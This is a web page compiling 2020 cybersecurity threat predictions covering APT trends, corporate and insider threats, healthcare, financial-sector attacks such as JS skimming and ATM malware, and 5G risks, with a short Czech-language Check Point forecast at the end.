Predictions 2020 H Analýza Globální hrozby Statistika Risk Trendy Predictions Graf
2020 2019 English CZ Corporate security prediction 2020 Cybersecurity of connected healthcare 2020: Overview and predictions Cyberthreats to financial institutions 2020: Overview and predictions 5G technology predictions 2020
Advanced threat predictions for 2020
Nothing is more difficult than making predictions. Rather than trying to gaze into a crystal ball, we will be making educated guesses based on what has happened during the last 12 months, to see where we can see trends that might be exploited in the near future.
This is what we think might happen in the coming months, based on the knowledge of experts in this field and our observation of APT attacks – since APT threat actors have historically been the center of innovation.
The next level of false flag attacks
The use of false flags has become an important element in the playbook of several APT groups. In the past, this has generally involved trying to deflect attention away from those responsible for the attack – for instance, the usage of Russian words in Lazarus group malware, or Romanian words by WildNeutron. In one notable case – the Olympic Destroyer attack – the Hades APT group sought to go further than just clouding the waters of attribution by forging elements of the attack to make it seem like the work of a different threat actor. We believe that this will develop further, with threat actors seeking not only to avoid attribution but to actively lay the blame on someone else.
For instance, this could include the usage of established backdoors by other unrelated APT actors, the theft and re-use of code (the recently published case of Turla reusing code from an unknown Iranian group, outlined by the UK NCSC and NSA comes to mind) or deliberately leaking source code so that other groups adopt it and muddy the waters further.
On top of all that, we should consider how actors continually use commodity malware, scripts, publicly available security tools or administrator software during their attacks and for lateral movement, making attribution increasingly difficult. Mixing a couple of false flags into this equation, where security researchers are hungry for any small clue, might be enough to divert authorship to someone else.
From ransomware to targeted ransomware
In the last two years we’ve seen a decline in numbers of all-purpose widespread ransomware attacks as cybercriminals have become more targeted in their use of this type of malware – focusing on organizations that are likely to make substantial payments in order to recover their data. We are calling this technique ‘targeted ransomware’. Throughout the year, we recorded several cases where attackers used targeted ransomware, and we think that a likely future development will be more aggressive attempts to extort money. A potential twist might be that, instead of making files unrecoverable, threat actors will threaten to publish data that they have stolen from the victim company.
In addition to targeted ransomware, it is inevitable that the cybercriminals will also attempt to diversify their attacks to include other types of devices besides PCs or servers. For instance, ransomware in consumer products, such as smart TVs, smart watches, smart cars/houses/cities. As more devices become connected to the internet, cybercriminals will also be looking for ways to monetize their access to these devices. Ransomware is, unfortunately, the most effective tool for extracting a financial profit from the victims.
New online banking and payments attack vectors
A new potential attack vector for cybercriminals could open up with the new banking regulations that have recently come into full effect across the EU. The PSD2 (Payments Services Directive) lays down regulatory requirements for companies that provide payment services, including the use of personal data by new fintech companies that are not part of the established banking community. Security of online, including mobile, payments is a key aspect of the legislation. Nevertheless, as banks will be required to open their infrastructure and data to third parties who wish to provide services to bank customers, it is likely that attackers will seek to abuse these new mechanisms with new fraudulent schemes.
More infrastructure attacks and attacks against non-PC targets
Determined threat actors have, for some time, been extending their toolsets beyond Windows, and even beyond PC systems: VPNFilter and Slingshot, for example, targeted networking hardware. The benefit to an attacker, of course, is that once they have compromised such devices, it gives them flexibility. They could opt for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In our threat predictions for 2019, we considered the possibility of ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker. In June, it was revealed that hackers had infiltrated the networks of at least 10 cellular telcos around the world, and had remained hidden for years. In some cases, it seems they had been able to deploy their own VPN services on telco infrastructure. The convergence of real and cyber worlds brought about by the profusion of IoT devices offers growing opportunities for attackers; and it’s evident that threat actors are aware of the potential. This year it was reported that unknown attackers stole 500MB of data from NASA’s Jet Propulsion Laboratory using a Raspberry Pi. In December last year, the UK’s Gatwick airport was brought to a standstill for fear of a possible collision after at least one drone was sighted above one of the runways. While it’s unclear whether this was the result of a hobbyist drone owner or a determined DDoS attacker, the fact remains that part of the country’s critical infrastructure was brought to a standstill because of the use of a drone. The number of such attacks will undoubtedly grow.
In recent years, we have seen a number of high-profile attacks on critical infrastructure facilities and these have typically been aligned to wider geo-political objectives. While most infections in industrial facilities continue to be from ‘mainstream’ malware, this fact itself highlights just how vulnerable these facilities can be. While targeted attacks on critical infrastructure facilities are unlikely ever to become a mainstream criminal activity, we do expect to see the number grow in the future. Geo-political conflicts are now played out in a world where the physical and cyber are increasingly converging; and, as we have observed before, such attacks offer governments a form of retaliation that lies between diplomacy and war.
Increased attacks in regions that lie along the trade routes between Asia and Europe
Clausewitz’s dictum, “War is merely the continuation of politics by other means”, can be extended to include cyberconflict, with cyberattacks reflecting wider real-world tensions and conflicts. We have seen numerous examples. Consider, for example, accusations of Russian interference in US elections and fears about a possible reboot of this in the run-up to the 2020 elections. We’ve seen it in the ‘naming-and-shaming’ of alleged Chinese hackers in US indictments. The widespread use of mobile implants to surveil ‘persons of interest’ is another example.
There are several ways this could play out. They include a growth in political espionage as governments seek to secure their interests at home and abroad. This could mean monitoring the activities of ‘undesirable’ individuals or movements within the country, as well as those of potential opponents abroad. It is likely to extend also to technological espionage in situations of potential or real economic crisis and resulting instability. This could result in new attacks in regions that lie along trade routes between Asia and Europe, including Turkey, East and South Europe and East Africa.
It’s quite possible that we will see changes to legislation and policy, as governments look to define more clearly what is and what isn’t allowed. On the one hand, this could be used as a way to establish plausible deniability and thereby avoid sanctions if the finger of suspicion is pointed at one state by another. On the other hand, it could enable more aggressive use of technology, as several justice departments seem keen to open the door to different kinds of ‘lawful interception’ to collect evidence on computers. One likely response from criminal groups will be greater use of encryption and the Darknet to conceal their operations.
Increasing sophistication of attack methods
It is hard to know exactly how advanced the top-class attackers really are and what kind of resources they have in their pockets. Of course, every year we learn a bit more: for instance, a few years ago we observed an apparent endless supply of zero-days for resourceful attackers who were ready to pay for them. This year we observed several examples, but probably the most interesting is the one involving at least 14 exploits for iOS during the last two years, as exposed by Google in August.
The new isolation methods implemented for Microsoft Word and other software traditionally targeted in spear-phishing campaigns might have a significant impact in malware delivery methods, forcing less sophisticated actors to change the way they spread malware.
We believe it is likely that additional interception capabilities, similar to the Quantum insert attacks described a few years ago, are already being used; and hopefully we will be able to discover some of them.
It also seems likely that attackers will exfiltrate data with non-conventional methods, such as using signaling data or Wi-Fi/4G, especially when using physical implants (something we also believe is probably being overlooked). In a similar vein, we believe more attackers will use DoH (DNS over HTTPS) in the future to conceal their activities and make discovery more difficult. Finally, it is possible that during the coming months we will start discovering more UEFI malware and infections as our ability to see such systems is slowly improving.
Use of supply chains will continue to be one of the most difficult delivery methods to address. It is likely that attackers will continue to expand this method through manipulated software containers, for example, and abuse of packages and libraries.
A change of focus towards mobile attacks
During the last 10 years, an important transition has taken place: the main storage for our digital lives has moved from the PC to mobiles. Some threat actors were quick to notice this and begin focusing on developing attack tools for mobiles. While we have constantly been predicting a huge increase in the number of attacks against mobiles, the observations from the field haven’t always reflected this inferred evolution. However, the lack of observations of a phenomenon doesn’t necessarily imply that it’s not happening.
We have already discussed how an attacker abused at least 14 zero-day vulnerabilities in iOS to target certain minorities in Asia. We also saw recently how Facebook sued the Israeli company NSO for allegedly misusing its servers (to deploy malware to intercept user data). We also saw how Android zero-click, full persistence exploits are now more expensive (according to Zerodium’s price list) than those for the iPhone.
All of this is telling us how much money attackers are investing in developing these technologies. It is clear to all of them how nearly everyone has a phone in his/her pocket and how valuable the information on those devices is. Every year we see new movements in this direction. We also see how complicated it might be for security researchers to obtain more technical details about attacks on such platforms, given the lack of visibility or accessibility.
There are no good reasons to think this will stop any time soon. However, due to the increased attention given to this subject by the security community, we believe the number of attacks being identified and analyzed in detail will also increase.
The abuse of personal information: from deep fakes to DNA leaks
We have previously discussed how data leaks help attackers to craft more convincing social engineering attacks. Not every adversary has a complete profile of potential victims to abuse, which makes the increasing amount of leaked data very valuable. This is also true for ‘less targeted’ attacks like the ransomware cases we have already discussed.
In a world where logged data continues to grow, we can see the danger in what could be considered especially sensitive leaks, for instance when it comes to biometric data. Also, widely discussed deepfakes are providing the technology to make such attacks a possibility, especially when combining this with less obvious attack vectors such as video and audio. We should not forget how this can be automated, and how AI can help with the profiling and creation of such scams.
Yes, all this sounds futuristic, but it is very similar to some of the techniques discussed for driving election advertisements through social media. This technology is already in use and it is just a matter of time before some attackers take advantage of it.
The future holds so many possibilities that there are likely to be things that are not included in our predictions. The extent and complexity of the environments in which attacks play out offer so many possibilities. In addition, no single threat research team has complete visibility of the operations of APT threat actors. We will continue to try and anticipate the activities of APT groups and understand the methods they employ, while providing insights into their campaigns and the impact they have.
Corporate security prediction 2020
Moving to the cloud
The popularity of cloud services is growing, and threat actors are here to exploit the trend.
We are observing more and more cases where our customers’ infrastructure is partially or entirely located in the cloud – cloud migration has been the dominant trend of the past couple of years. This is resulting in a blurring of infrastructure boundaries. In 2020, we expect the following trends to emerge.
It will become more difficult for attackers to separate the resources of the targeted company from those of cloud providers. At the same time, it will be much more difficult for companies to detect an attack on their resources in the initial stages.
The transition to the cloud has blurred the boundaries of company infrastructures. As a result, it is becoming very difficult to target an organization’s resources in a precise manner. So, conducting an attack will become harder and the actions of threat actors will become more sophisticated or more frequent – relying on chance rather than planning. On the other hand, it will also be difficult for a company to identify targeted attacks at an early stage and separate them from the overall mass of attacks on the ISP.
Investigating incidents will become more complex and in some cases less effective.
Those who plan to deploy cloud infrastructure in 2020 need to talk in advance with their provider about a communications plan in the event of an incident, because time is of the essence when it comes to security incidents. It’s very important to discuss what data is logged, and how to back it up. Lack of clarity on such information can lead to complications or even make successful incident investigation impossible. We note, however, that awareness of cloud infrastructure security is not growing as fast as the the popularity of cloud services, so we expect to see an increase in the complexities of investigating incidents as well as a decrease in the effectiveness of incident response.
It’s also worth noting that when companies pass on their data to a cloud provider for storage or processing, they also need to consider whether the provider possesses the necessary level of cybersecurity. Even then, it is hard to be absolutely certain that the services they are paying for are really secure, as it requires a level of expertise in information security that not all technical officers possess.
Criminals will migrate to the cloud and forge ahead.
The increase in the availability of cloud services will allow not just companies but also attackers to deploy infrastructure in the cloud. This will reduce the complexity of an attack and, consequently, will increase their number and frequency. This could potentially affect the reputation of the cloud services themselves, as their resources will be used in large-scale malicious activity. To avoid this, providers will have to consider reviewing their security procedures and change their service policies and infrastructure.
Insiders threat
The good news is that we are observing an increase in the overall level of security of businesses and organizations. In this regard, direct attacks on infrastructure (for example, penetrating the external perimeter through the exploitation of vulnerabilities) is becoming much more expensive, requiring more and more skills and time for the attacker. As a result, we predict:
Growth in the number of attacks using social engineering methods.
In particular, this means phishing attacks on company employees. As the human factor remains a weak link in security, the focus on social engineering will increase as other types of attacks become more difficult to carry out.
Growth of the insider market.
Due to the increasing cost of other attack vectors, attackers will be willing to offer large amounts of money to insiders. The price for insiders varies from region to region and depends on the target’s position in the company, the company itself, its local rating, the type and complexity of insider service that is requested, the type of data that is exfiltrated and the level of security at the company.
There is a number of ways such insiders can be recruited:
By simply posting an offer on forums and offering a reward for certain information.
The attackers may disguise their actions so that employees don’t realize they are acting illegally, disclosing personal information or engaging in insider activity. For example, the potential victims may be offered a simple job on the side to provide information, while being reassured that the data is not sensitive, though it may in fact relate to the amount of funds in a bank client’s personal account or the phone number of an intended target.
Blackmailing. We also expect to see increased demand for the services of groups engaged in corporate cyber-blackmail and, as a consequence, an increase in their activity.
Cyber-blackmailing groups that collect compromising info on company employees (e.g. evidence of crimes, personal records and personal data such as sexual preferences) for the purpose of blackmail will become more active too in the corporate sector. Usually this happens in the following way: the threat actors take a pool of leaked emails and passwords, find those that are of interest to them and exfiltrate compromising data that is later used for blackmail or cyberespionage. The stronger the cultural specifics and regional regulations, the faster and more effective the attackers’ leverage is. As a result, attacks on users in order to obtain compromising data are predicted to increase.
Cybersecurity of connected healthcare 2020: Overview and predictions
More than two years after the infamous Wannacry ransomware crippled medical facilities and other organizations worldwide, the healthcare sector seems to be learning its lesson, as the number of attacked medical devices – doctors’ computers, medical servers and equipment – in 2019 decreased globally.
Our statistics showed that from 30% of computers and devices in medical organizations being infected in 2017, this number dropped to 28% in 2018, and we detect almost a third less attacks for the current year (19%).
As much as we want to believe everybody has woken up to the dangers of attacks like Wannacry, we still witnessed a number of ransomware attacks against healthcare facilities in several countries. There are two key reasons for such cyberattacks: a lack of attention to the risks of digitalization and a lack of cybersecurity awareness among staff at medical facilities.
Our conclusions about the human factor in cybersecurity are drawn from survey results. Kaspersky conducted a survey among healthcare sector employees in the US and Canada that revealed nearly a third of all respondents (32%) had never received any cybersecurity training from their workplace.
One-in-10 employees in management positions also admitted that they were unaware of a cybersecurity policy in their organization.
Another serious issue is the lack of proper security standards implemented in medical IoT devices. Throughout the year security researchers identified a number of vulnerabilities in different medical equipment. Hopefully, drawing attention to this subject will make manufacturers collaborate with the security community and contribute more to the creation of a safer environment in the world of smart medicine.
Forecast 2020
Interest in medical records on the dark web will grow. From our research into underground forums we see that such records are sometimes even more expensive than credit card information. It also opens up potentially new methods of fraud: armed with someone’s medical details it’s easier to scam the patient or his/her relatives.
Access to internal patient info makes it possible not only to steal but to modify records. This can lead to targeted attacks on individuals in order to mess up diagnostics. Diagnostic mistakes are the number one reason for patient deaths in the medical field according to statistics (even ahead of poorly qualified medical personnel).
The number of attacks on medical facility devices in countries that are just starting the digitalization process in the field of medical services will grow significantly next year. We expect to see the emergence of targeted ransomware attacks against hospitals in developing countries. Medical institutions are turning into industrial infrastructures. Loss of access to internal data (e.g. digital patient records) or internal resources (e.g. connected medical equipment inside a hospital) can halt patient diagnostics and even disrupt emergency aid.
Growing numbers of targeted attacks against medical research institutes and pharmaceutical companies conducting innovative research. Medical research is extremely expensive and some APT groups that are specialized in intellectual property theft will attack such institutions more frequently in 2020.
Thankfully, we’ve never seen attacks on implanted medical devices (e.g. neuro-stimulators) in the wild. But the fact that there are numerous security vulnerabilities in such devices means that it’s just a matter of time. The creation of centralized networks of wearable and implanted medical devices (as in the case of cardio stimulators) will lead to the emergence of a new threat: a single point of entry to attack all the patients using such devices.
Cyberthreats to financial institutions 2020: Overview and predictions
Key events 2019
Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered
Multi-factor authentication (MFA) and biometric challenges
Targeted attack groups specializing in financial institutions: splitting and globalization
ATM malware becomes more targeted
Card info theft and reuse: magecarting everywhere and battle of POS malware families in Latin America
Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered
During the last few years, cybercriminals have invested a lot in methods to bypass anti-fraud systems, because now it’s not enough just to steal the login, password and PII – they now need a digital fingerprint to bypass anti-fraud systems in order to extract money from the bank. During 2019, we identified a huge underground market called Genesis, which sells digital fingerprints of online banking users from around the globe.
From an anti-fraud system perspective, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device, and the personal behavioral attributes of the user. It includes the IP address (external and local), screen information (screen resolution, window size), firmware version, operating system version, browser plugins installed, time zone, device ID, battery information, fonts, etc. The device may have over 100 attributes used for browsing. The second part of a digital identity is the behavioral analysis.
As criminals are continuously looking for ways to defeat anti-fraud safeguards, they try to substitute the system’s real fingerprint with a fake one, or with existing ones stolen from someone else’s PC.
The Genesis Store is an online invitation-only private cybercriminal market for stolen digital fingerprints. At the time of our research, it offered more than 60 thousand stolen bot profiles. The profiles include browser fingerprints, website user logins and passwords, cookies, credit card information, etc. By uploading this fingerprint to the Tenebris Linken Sphere browser, criminals are able to masquerade as legitimate online banking users from any region, country, state, city, etc.
This type of attack shows that criminals have in-depth knowledge of how internal banking systems work and it’s a real challenge to protect against such attacks. The best option is to always use multi-factor authentication.
Multi-factor authentication (MFA) and biometric challenges
MFA is a challenge for cybercriminals. When MFA is used, they have to come up with techniques to bypass it. The most common methods used during the last year were:
Exploiting vulnerabilities and flaws in the configuration of the system. For example, criminals were able to find and exploit several flaws in remote banking systems to bypass OTPs (one time passcodes);
Using social engineering, a common method among Russian-speaking cybercriminals and in APAC region;
SIM swapping, which is especially popular in regions like Latin America and Africa. In fact, despite SMS no longer being considered a secure 2FA, low operational costs mean it’s the most popular method used by providers.
In theory, biometrics should solve a lot of problems associated with two-factor authentication, but practice has shown that it may not be so simple. Over the past year, several cases have been identified that indicate biometrics technology is still far from perfect.
Firstly, there are quite a few implementation problems. For example, Google Pixel 4 does not check if your eyes are open during the unlocking process using facial characteristics. Another example is the possibility of bypassing fingerprint authentication using the sensor under the screen on smartphones made by various manufacturers, including popular brands such as Samsung.
There is another trick that has been exploited in Latin America: a visual capturing attack. Cybercriminals installed rogue CCTV cameras and used them to record the PINs people used to unlock their phones. Such a simple technique is still very effective for both types of victims: those who use biometrics and those who prefer PINs to fingerprints or facial recognition. This is because, when a device is dusty or greasy (and the same applies to a user’s fingers), the best way to unlock a phone is to use a PIN.
Secondly, there were several high-profile leaks of biometric databases. The most notorious was the leak of the Biostar 2 database that included the biometric data of over 1 million people. The company stored unencrypted data, including names, passwords, home addresses, email addresses and, most importantly, unencrypted biometric data that included fingerprints and facial recognition patterns as well as the actual photos of faces. A similar leak occurred at a US Customs and Border Patrol contractor, where biometric information of over 100,000 people was leaked.
There have already been several proof-of-concept attacks that use biometric data to bypass security controls, but those attacks could still be countered with system updates. With these latest leaks, on the other hand, this won’t work because your biometric data cannot be changed – it stays with you forever.
The cases mentioned above, combined with the high-quality research carried out by cybercriminals to obtain a complete digital fingerprint of a user in order to bypass anti-fraud systems, suggest that relying solely on biometric data will not solve the current problems. Today’s implementations need a lot of effort and more research to make them truly secure.
Targeted attack groups specializing in financial institutions: splitting and globalization
FIN7
In 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some believed that the arrest would have an impact on the group’s operations, but this does not seem to have been the case. In fact, the number of groups operating under the umbrella of CobaltGoblin and FIN7 has grown: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.
The first operating under this umbrella is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or their PoS infrastructure. It relies on the Griffon JScript backdoor and Cobalt/Meterpreter and, in more recent attacks, PowerShell Empire.
The second is CobaltGoblin/Carbanak/EmpireMonkey. It uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.
The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties to FIN7.
All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by their exploitation framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.
In the middle of 2019, FIN7 fell silent, but returned at the end of the year with new attacks and new tools. We suspect that the silent period is connected to their infrastructure shutdown that occurred after closing a bulletproof hosting company in Eastern Europe.
In contrast to FIN7, the activity of the Cobalt Goblin Group was stable throughout the year, which once again proves that these groups are connected, but operate on their own: their toolsets and TTPs are very similar, but operate independently; and only occasionally can we spot overlaps in infrastructure. At the same time, the intensity of attacks is slightly lower than in 2018. Cobalt Goblin’s tactics have remained the same: they use documents with exploits that first load a small downloader and then a Cobalt beacon. The main targets also remain the same: small banks in a variety of countries. Perhaps we have detected a lower number of attacks due to diversification, because some indicators suggest the group could also be engaging in JS sniffing (MageCarting) in order to obtain data about payment cards directly from websites.
JS sniffing was extremely popular throughout the year and we found thousands of e-commerce websites infected with these scripts. The injected scripts act in different ways and the infrastructure of the attackers is very different, which suggests that this type of fraud is used by at least a dozen cybercrime groups.
The Silence group actively expanded its operations into different countries throughout the year. We detected attacks in regions where we have never seen them before. For example, we recorded attacks in Southeast Asia and Latin America. This indicates that they have either expanded their operations themselves or started cooperating with other regionally installed cybercrime groups. However, when we look at the development of their main backdoor, we see that their technologies have barely changed over the last two years.
ATM malware becomes more targeted
When it came to ATM malware, we discovered a number of completely new families in 2019. The most notable were ATMJadi and ATMDtrack.
ATMJadi is an interesting one because it doesn’t use the standard XFS, JXFS or CSC libraries. Instead, it uses the victim bank’s ATM software Java proprietary classes: meaning the malware will only work on a small subset of ATMs. It makes this malware very targeted (towards one specific bank).
This is reminiscent of the FASTcach case from 2018, when criminals targeted servers running AIX OS. With a decrease in the number of general-purpose cashout tools, we can say that ATM malware is becoming rarer and more targeted.
Another interesting piece of malware is ATMDtrack, which was first detected in financial institutions in India and is programmed to cash out ATMs. Using the Kaspersky Targeted Attack Attribution Engine (KTAE), we were able to attribute these attacks to the Lazarus group, which supports our prediction from 2018 that there will be “more nation-state sponsored attacks against financial organizations“. Moreover, similar spyware has been found in research centers, with Lazarus APT group using almost identical tools to steal research results from scientific institutes.
Card info theft and reuse
During the year we saw a lot of malware targeting end users and businesses looking for credit card data. In Brazil, in particular, we saw a couple of malware families fighting it out between themselves to maintain control of infected devices. HydraPOS and ShieldPOS were very active during the year, with new versions that included a lot of new targets; Prilex, meanwhile, reduced its activities in the second half of the year.
ShieldPOS has been active since at least 2017 and, after being malware only, it has finally evolved into a MaaS (malware-as-a-service). This fact shows there’s great interest from Latin American cybercriminals in running their own “business” to steal credit cards. HydraPOS has been mostly focused on stealing money from POS systems in restaurants, parking slot machines and different retail stores.
Compared to ShieldPOS, HydraPOS is an older campaign from an actor we named Maggler, which has been in the credit card business since at least 2016. The main difference is that, unlike ShieldPOS, it doesn’t work as MaaS. In both cases, we suspect that the initial infection vector is a carefully prepared social engineering campaign involving telephone calls to the victims.
Analysis of forecasts for 2019
Before giving our forecasts for 2020, let’s see how accurate our forecasts for 2019 turned out to be:
The emergence of new groups due to the fragmentation of Cobalt/Carbanak and FIN7: new groups and new geography.
Yes, we saw CobaltGoblin activity, FIN7 activity, CopyPaste activity and the intersection of IoCs and the Silence group.
The first attacks through the theft and use of biometric data.
Yes, hacking of various biometric data databases regularly appeared throughout the year. We also revealed a digital fingerprint market where criminals can buy digital fingerprints, which includes, among other things, behavioral data (component of biometrics).
The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, Southeast Asia and Central Europe.
No. It turned out that well-known groups such as Lazarus, Silence and CobaltGoblin took their place and very actively attacked financial institutions in these regions.
Continuation of supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world.
Yes.
Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of POS attacks with attacks on systems accepting online payments (Magecarting/JS skimming).
Yes, the number of groups that started carrying out attacks on online payment systems grew constantly over the year. We detected thousands of websites that were affected by JS skimming.
The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network.
Yes, and not only in financial institutions but even the aerospace industry, namely NASA, has suffered from this type of attack.
Attacks on mobile banking for business users.
No.
Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wire transfers.
Yes, BEC (business email compromise) attacks have been on the rise worldwide. We have seen major attacks in Japan, while there have also been campaigns in South America, particularly in Ecuador.
Additionally, advanced social attacks have been actively used in Brazil to make POS operators go to a malicious website to download specially crafted remote control modules and run them, for example, in HydraPOS attacks.
Forecast 2020
Attacks against Libra and TON/Gram
The successful launch of cryptocurrencies such as Libra and Gram might lead to the worldwide spread of this type of asset, which naturally will attract the attention of criminals. Given the serious surge in cybercriminal activity during the rapid growth of Bitcoin and altcoins in 2018, we predict that a similar situation will most likely unfold around Gram and Libra. Large players in this market should be especially careful, as there are a number of APT groups, such as WildNeutron and Lazarus, whose interests include crypto assets. They are very likely to exploit these developments.
Reselling bank access
During 2019, we witnessed cases where groups who specialize in targeted attacks on financial institutions appeared in the victims’ networks after intrusions by other groups that specialize in selling rdp/vnc access, such as FXMSP and TA505. These facts are also confirmed by underground forums and chat monitoring.
In 2020, we expect an increase in the activity of groups specializing in the sale of network access in the African and Asian regions, as well as in Eastern Europe. Their prime targets are small banks, as well as financial organizations recently bought by big players who are rebuilding their cybersecurity system in accordance with the standards of their parent companies.
Ransomware attacks against banks
This forecast logically follows from the previous one. As mentioned above, small financial institutions often become the victims of opportunistic cybercriminals. If these criminals cannot resell access, or even if it becomes less likely that they will be able to withdraw money, then the most logical monetization of such access is ransomware. Banks are among those organizations that are more likely to pay a ransom than accept the loss of data, so we expect the number of such targeted ransomware attacks to continue to rise in 2020.
Another ransomware attack vector against small and medium financial institutions will be a “pay-per-install” scheme. Traditional botnets will eventually turn into increasingly popular delivery mechanisms against those financial institutions.
2020: the return of custom tooling
Measures taken by antivirus products to effectively detect open source tools used for pen testing purposes, and the adoption of the latest cyberdefense technologies, will push cybercrime actors to return to custom tooling in 2020 and also invest in new Trojans and exploits.
Global expansion of mobile banking Trojans: result of leaked source
Our research and monitoring of underground forums suggests that the source code of some popular mobile banking Trojans was leaked into the public domain. Given the popularity of such Trojans, we expect a repeat of the situation when the source code of ZeuS and SpyEye Trojans were leaked: the number of attempts to attack users will increase at times, and the geography of attacks will expand to almost every country in the world.
Investment apps on the rise: new target for criminals
Mobile investment apps are becoming more popular among users around the globe. This trend won’t go unnoticed by cybercriminals in 2020. Given the popularity of some fintech companies and exchanges (for both real and virtual money), cybercriminals will realize that not all of them are prepared to deal with massive cyberattacks, as some apps still lack basic protection for customer accounts, and do not offer two-factor authentication or certificate pinning to protect app communication. Several governments are deregulating this area and new players are appearing every day, becoming popular very quickly. In fact, we have already seen attempts by cybercriminals to substitute the interfaces of these apps with their own malicious versions.
Magecarting 3.0: even more attacker groups and cloud apps to become prime targets
Over the past couple of years, JS skimming has gained immense popularity among attackers. Unfortunately, cybercriminals now have a huge attack surface that consists of vulnerable e-commerce websites and extremely cheap JS skimmer tools available for sale on various forums, starting at $200. At the moment we are able to distinguish at least 10 different actors involved in these types of attacks and we believe that their number will continue to grow during the next year. The most dangerous attacks will be on companies that provide services such as e-commerce as a service, which will lead to the compromise of thousands of companies.
Political instability leading to the spread of cybercrime in specific regions
Some countries are experiencing political and social upheaval, resulting in masses of people seeking refugee status in other countries. These waves of immigration include all sorts of people, including cybercriminals. This phenomenon will result in the spread of geographically localized attacks in countries that have not previously been affected by them.
5G technology predictions 2020
It is estimated that data will reach 175 zettabytes worldwide by 2025, up from 1.2 zettabytes in 2010, when 4G was first being deployed globally. 5G is known as the fifth generation cellular network technology. It is expected to be as much as 100 times faster than the present 4G systems, with up to 25 times lower latency or lag time, and as many as one million devices supported within one square kilometer. The foundation of 5G can be summarized in five technologies: millimeter waves, small cell networks, massive MIMO (multiple input multiple output), beamforming, and bytes full duplex.
With the dramatic increase in the amount and transfer speed of connected devices comes a natural expansion and amplification of the threats. The evolution, development and connectivity of numerous systems within 5G opens the door to numerous threats, which can be summarized as follows.
Vulnerabilities of telco services and infrastructure
As 5G innovations spread, more shortcomings and imperfections will show up in 5G gear, customer frameworks and administration by authorities. This could enable an attacker to damage or bring down a telco infrastructure, spy on its clients or divert its traffic. Governments need to set up nationwide capabilities to utilize objective and specialized confirmation techniques to evaluate both 5G adopters and suppliers, to discover faults and stipulate fixes.
User safety and privacy concerns
On the privacy side, matters become more complex. The advent of 5G with its short range will definitely mean more cell communication towers being deployed into commercial centers and buildings. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data being sent by user devices, which could show exactly what is happening inside a user’s home and at the very least describe via metadata their living environment, in-house sensors and parameters. Such data could expose a user’s privacy or could be manipulated and misused. Service providers may also consider selling such data to other service companies such as advertisers in an attempt to open up new revenue streams. In some cases, vulnerabilities could cause injuries or ill health, for instance, if a client’s therapeutic gadgets are disconnected and not operational. The potential threats will be even greater when critical infrastructure components such as water and energy equipment are put at risk.
Critical infrastructure expansion and risks
5G will assist in spreading communication to a larger number of geographical areas than at present. It will also equip non-networkable gadgets with remote monitoring and control. However, increasing numbers of connected systems like this will no longer be non-critical infrastructure, expanding our exposure to risk. People are being enticed to adopt convenience and non-stop communications, but the related threats could pose public safety risks.
Action plan
5G is going to have a revolutionary impact on telecommunications because, in addition to the technology itself, it is going to become a basis for other technologies and inventions, giving way to technological advances, particularly in the fields of smart cities, intelligent power grids and defense facilities. It is the next generation of cellular network using the existing 4G LTE in addition to opening up millimeter wave band. 5G will be able to welcome more network-connected devices and considerably increase speeds for all users.
However, as with every major technology, especially while it is evolving, 5G is likely to draw the attention of threat actors looking for opportunities to attack it. We may, for instance, see large-scale DDoS attacks, or challenges in terms of protecting a sophisticated network of connected devices whereby the compromise of one device can lead to a whole network crashing. In addition, 5G is developing technology on top of the previous infrastructure, which means it will inherit the vulnerabilities and misconfigurations of its predecessor.
Furthermore, the communication trust model will not be identical to previous cellular generations. IoT and M2M devices are expected to occupy a greater portion of the network capacity. The interaction of all these devices in the 5G network will likely trigger unprecedented issues in product design and device behavior. Given these fears and the political challenges, encouraging a zero-trust network model and strict product quality compliance would help build trust between the technology adopters and providers.
Government and industry leaders should join forces to promote secure and safe 5G technology projects to enhance the services and quality of life for citizens of smart cities. Furthermore, the communication trust model will be different from previous cellular generations.
IoT and M2M devices are expected to occupy the 5G network bandwidth, and the interlinkage of all these devices in the 5G network will reveal previously unknown problems in the design and behavior of 5G. With regards to such worries and the additional political disputes, adopting a zero-trust network model and strict quality assessment along with compliance would help shape the relationship between the technology adopters and providers.
Hi-tech vendor and governmental structures should join forces to prevent the exploitation of 5G by threat actors and preserve its innovative features for technical progress and improving the quality of living conditions.
Celosvětová kyberbezpečnostní předpověď společnosti Check Point na rok 2020:
Nová kybernetická „studená válka“ na obzoru – Budeme svědky nové studené války, která bude probíhat v online světě, protože západní a východní mocnosti stále častěji oddělují své technologie a zpravodajské informace. Jasným ukazatelem tohoto vývoje je pokračující obchodní válka mezi USA a Čínou a oddělení dvou významných ekonomik. Kybernetické útoky budou stále více financovat a využívat velké země pro zažehnutí konfliktů mezi menšími státy, aby tak rozšířily sféru svého vlivu, jak jsme nedávno mohli vidět například při kybernetických operacích proti Íránu v návaznosti na útoky na saúdskoarabská ropná zařízení.
